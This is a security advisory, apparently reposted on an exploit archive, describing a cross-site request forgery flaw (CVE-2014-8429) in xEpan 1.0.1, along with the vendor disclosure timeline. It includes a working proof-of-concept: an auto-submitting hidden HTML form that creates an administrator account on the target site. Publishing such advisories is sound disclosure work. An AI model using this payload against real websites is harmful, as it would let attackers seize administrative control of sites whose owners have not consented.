xEpan 1.0.1 Cross Site Request Forgery Vulnerability

Product: xEpan
Vendor: Xavoc Technocrats Pvt. Ltd.
Vulnerable Version(s): 1.0.1 and probably prior
Tested Version: 1.0.1
Advisory Publication:  October 22, 2014  [without technical details]
Vendor Notification: October 22, 2014 
Public Disclosure: November 26, 2014 
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2014-8429
Risk Level: Medium 
CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Not Fixed
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in xEpan, which can be exploited to compromise vulnerable web site.


1) Сross-Site Request Forgery (CSRF) in xEpan: CVE-2014-8429

The vulnerability exists due to insufficient validation of the HTTP request origin when creating new user accounts. A remote unauthenticated attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit, create new account with administrative privileges and get total control over the vulnerable website.  

A simple CSRF exploit below creates an administrative account with username "immuniweb" and password "password":


<form action="http://[host]/?page=owner/users&web_owner_users_crud_virtualpage=add&submit=web_web_owner_users_crud_virtualpage_form" method="post" name="main">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_name" value="name">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_email" value="[email protected]">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_username" value="immuniweb">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_password" value="password">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_created_at" value="21/10/2014">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_type" value="100">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_is_active" value="1">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_activation_code" value="">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_last_login_date" value="">
<input type="hidden" name="ajax_submit" value="form_submit">
<input type="submit" id="btn">
</form>

<script>
document.main.submit();
</script>


-----------------------------------------------------------------------------------------------

Solution:

Currently we are not aware of any official solution for this vulnerability.

<b>Disclosure timeline:</b>
2014-10-22 Vendor notified via several emails.
2014-10-22 Vendor denies vulnerability.
2014-11-06 Vulnerability is confirmed in the latest version of xEpan 1.0.4 which was released on the 2nd of November (we initially suspected a "silent fix"). 
2014-11-06 Vulnerability confirmed in 1.0.4 as well. Vendor notified about the problem once again.
2014-11-10 Fix requested via several emails.
2014-11-17 Fix requested via several emails.
2014-11-24 Fix requested via several emails.
2014-11-24 Vulnerability still exist in latest version 1.0.4.1 which was released at November, 20.
2014-11-26 Public disclosure.

#  0day.today [2018-04-01]  #